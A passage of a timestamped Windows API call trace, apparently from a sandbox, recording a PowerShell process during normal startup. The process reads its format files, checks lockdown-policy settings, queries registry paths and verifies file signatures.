	[0043.726] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047325360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047325360*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0043.727] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2000
	[0043.727] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047325360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047325360*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0043.727] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3000
	[0043.727] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047325360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047325360*, lpNumberOfBytesRead=0x184b47cf98*=0x219, lpOverlapped=0x0) returned 1
	[0043.727] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3219
	[0043.727] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047325360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047325360*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0043.727] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6ff0
	[0043.727] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6ff0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0043.728] CoTaskMemFree (pv=0x1505f3b6ff0) 
	[0043.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0043.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0043.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0043.728] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0043.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0043.728] WldpGetLockdownPolicy () returned 0x0
	[0043.728] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0043.728] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x40c) returned 0x0
	[0043.728] RegQueryValueExW (in: hKey=0x40c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0043.728] RegCloseKey (hKey=0x40c) returned 0x0
	[0043.728] CloseHandle (hObject=0x3d8) returned 1
	[0043.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0043.729] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x15047335a80 | out: lpFileInformation=0x15047335a80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3219)) returned 1
	[0043.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0043.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0043.730] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3219)) returned 1
	[0043.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0043.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.731] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47ce18 | out: phkResult=0x184b47ce18*=0x3d8) returned 0x0
	[0043.731] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47ce68, lpData=0x0, lpcbData=0x184b47ce60*=0x0 | out: lpType=0x184b47ce68*=0x1, lpData=0x0, lpcbData=0x184b47ce60*=0x56) returned 0x0
	[0043.731] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47ce68, lpData=0x15047336440, lpcbData=0x184b47ce60*=0x56 | out: lpType=0x184b47ce68*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47ce60*=0x56) returned 0x0
	[0043.732] RegCloseKey (hKey=0x3d8) returned 0x0
	[0043.732] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6770
	[0043.732] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x1505f3b6770 | out: pszPath="C:\\Windows\\system32") returned 0x0
	[0043.732] CoTaskMemFree (pv=0x1505f3b6770) 
	[0043.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0043.732] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0043.732] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x1505f3b8970 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0
	[0043.732] CoTaskMemFree (pv=0x1505f3b8970) 
	[0043.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64", nBufferLength=0x105, lpBuffer=0x184b47c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64", lpFilePart=0x0) returned 0x13
	[0043.732] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9c90
	[0043.733] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x1505f3b9c90 | out: pszPath="C:\\Program Files") returned 0x0
	[0043.733] CoTaskMemFree (pv=0x1505f3b9c90) 
	[0043.733] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x184b47c800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10
	[0043.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0043.734] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3219)) returned 1
	[0043.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0043.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
	[0043.735] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0043.735] GetFileType (hFile=0x3d8) returned 0x1
	[0043.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0043.735] GetFileType (hFile=0x3d8) returned 0x1
	[0043.738] WTGetSignatureInfo () returned 0x0
	[0044.414] CertDuplicateCertificateContext (pCertContext=0x1505fab36b0) returned 0x1505fab36b0
	[0044.440] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5d0) returned 0x0
	[0044.440] RegQueryValueExW (in: hKey=0x5d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.440] RegQueryValueExW (in: hKey=0x5d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x15047341c48, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.440] RegCloseKey (hKey=0x5d0) returned 0x0
	[0044.441] CoTaskMemAlloc (cb=0x10) returned 0x1505fb06950
	[0044.441] CoTaskMemAlloc (cb=0x50) returned 0x1505f464fe0
	[0044.441] WinVerifyTrust () returned 0x0
	[0044.442] CoTaskMemFree (pv=0x1505f464fe0) 
	[0044.442] CoTaskMemFree (pv=0x1505fb06950) 
	[0044.442] CertFreeCertificateContext (pCertContext=0x1505fab36b0) returned 1
	[0044.442] CloseHandle (hObject=0x3d8) returned 1
	[0044.453] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9410
	[0044.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b9410, nSize=0x104 | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0044.453] CoTaskMemFree (pv=0x1505f3b9410) 
	[0044.473] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0044.473] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.473] CoTaskMemFree (pv=0x1505f3b8970) 
	[0044.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0044.473] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d080 | out: lpFileInformation=0x184b47d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0044.473] WldpGetLockdownPolicy () returned 0x0
	[0044.473] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.473] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0044.474] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0044.474] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.595] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc16f3adf, Data2=0xe801, Data3=0x46e6, Data4=([0]=0x96, [1]=0x22, [2]=0x8, [3]=0xd1, [4]=0x9a, [5]=0xeb, [6]=0x41, [7]=0xa0))) returned 0x0
	[0044.601] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x5d4e2d82, Data2=0x665a, Data3=0x425d, Data4=([0]=0xaa, [1]=0x64, [2]=0x8f, [3]=0xbb, [4]=0x9b, [5]=0x9f, [6]=0xb7, [7]=0xc4))) returned 0x0
	[0044.603] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x7c0e5fdf, Data2=0xce5e, Data3=0x45ba, Data4=([0]=0x86, [1]=0x8b, [2]=0x0, [3]=0x25, [4]=0x32, [5]=0xd5, [6]=0x73, [7]=0x6e))) returned 0x0
	[0044.605] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6122c3ed, Data2=0xfade, Data3=0x49c7, Data4=([0]=0x8a, [1]=0xce, [2]=0x42, [3]=0xff, [4]=0xf2, [5]=0xa0, [6]=0x22, [7]=0xac))) returned 0x0
	[0044.605] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xb888900d, Data2=0x65d, Data3=0x4d0f, Data4=([0]=0xba, [1]=0xbd, [2]=0x9f, [3]=0x46, [4]=0x53, [5]=0x9e, [6]=0x57, [7]=0x6e))) returned 0x0
	[0044.605] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xbf7dd74f, Data2=0x682a, Data3=0x4e1b, Data4=([0]=0x98, [1]=0xde, [2]=0x6d, [3]=0x7b, [4]=0xf9, [5]=0x9d, [6]=0x36, [7]=0xaf))) returned 0x0
	[0044.605] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9118cf2, Data2=0x5394, Data3=0x4254, Data4=([0]=0x9e, [1]=0x2f, [2]=0x7a, [3]=0xfb, [4]=0xee, [5]=0xd8, [6]=0x91, [7]=0x1c))) returned 0x0
	[0044.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.606] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9850
	[0044.606] GetSystemDirectoryW (in: lpBuffer=0x1505f3b9850, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.606] CoTaskMemFree (pv=0x1505f3b9850) 
	[0044.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0044.606] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0044.606] WldpGetLockdownPolicy () returned 0x0
	[0044.606] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.607] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0044.607] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0044.607] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0044.607] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.607] GetFileType (hFile=0x3d8) returned 0x1
	[0044.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.607] GetFileType (hFile=0x3d8) returned 0x1
	[0044.607] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0044.607] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.608] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
	[0044.609] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.609] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2000
	[0044.609] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.609] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3000
	[0044.609] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.610] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x4000
	[0044.610] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.610] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x5000
	[0044.610] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.610] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x6000
	[0044.610] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.611] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x7000
	[0044.611] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.611] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x8000
	[0044.611] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
